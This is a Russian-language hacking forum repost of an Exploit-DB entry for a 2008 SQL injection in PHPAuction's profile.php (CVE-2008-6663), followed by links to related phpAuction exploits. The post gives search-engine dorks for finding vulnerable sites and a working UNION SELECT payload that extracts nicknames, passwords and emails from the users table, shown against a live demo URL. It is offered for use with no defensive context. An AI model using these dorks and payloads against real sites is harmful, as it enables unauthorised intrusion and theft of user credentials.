Exploit phpAuction - 'profile.php' SQL Injection (1)

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5879
Проверка EDB
  1. Пройдено
Автор
MR.SQL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6663
Дата публикации
2008-06-20
Код: 
#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## PHPAuction ( profile.php user_id )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
##
## Email  : [email protected]
##
## !! SYRIAN HaCkErS  !!
########################
########################
##
## Script  : PHPAuction
##
## site    : www.phpauctions.info
##
########################
########################
##
## D0rk1 : allinurl: "profile.php?user_id" auction_id
##
## D0rk2 : allinurl: "active_auctions.php" user_id
##
##     -(:: SQL ::)-
##
##    www.site.com/
##         profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*
##
##  -(:: L!VE DEMO ::)-
##
##    http://phpauctions.info/phpauction/demo/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*
##
##    http://phpauctions.info/phpauction/demo/viewfaqs.php?cat=null
#######################
#######################
 -(:: Note ::)-
This script not >> (( phpAuction GPL ))  (( password Md5 ))

#######################################################################################################
#######################################################################################################

                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
                                         
 :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS ::
#######################################################################################################
#######################################################################################################

# milw0rm.com [2008-06-20]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit phpAuction 3.2 - 'lan' Remote File Inclusion
Ответы
0
Просмотры
338
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpAuction - 'profile.php' SQL Injection (2)
Ответы
0
Просмотры
340
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpAuction 1/2 - Unauthorized Administrative Access
Ответы
0
Просмотры
308
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpAuction 2.5 - Multiple Vulnerabilities
Ответы
0
Просмотры
307
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpAuction GPL Enhanced 2.51 - 'profile.php' SQL Injection
Ответы
0
Просмотры
296
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpAuction 3.2.1 - 'item.php' SQL Injection
Ответы
0
Просмотры
295
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpAuction GPL Enhanced 2.51 - Multiple Remote File Inclusions
Ответы
0
Просмотры
291
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpAuction 2.1 - 'phpAds_path' Remote File Inclusion
Ответы
0
Просмотры
265
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion
Ответы
0
Просмотры
500
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Terillion Reviews - Profile Id HTML Injection
Ответы
0
Просмотры
492
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу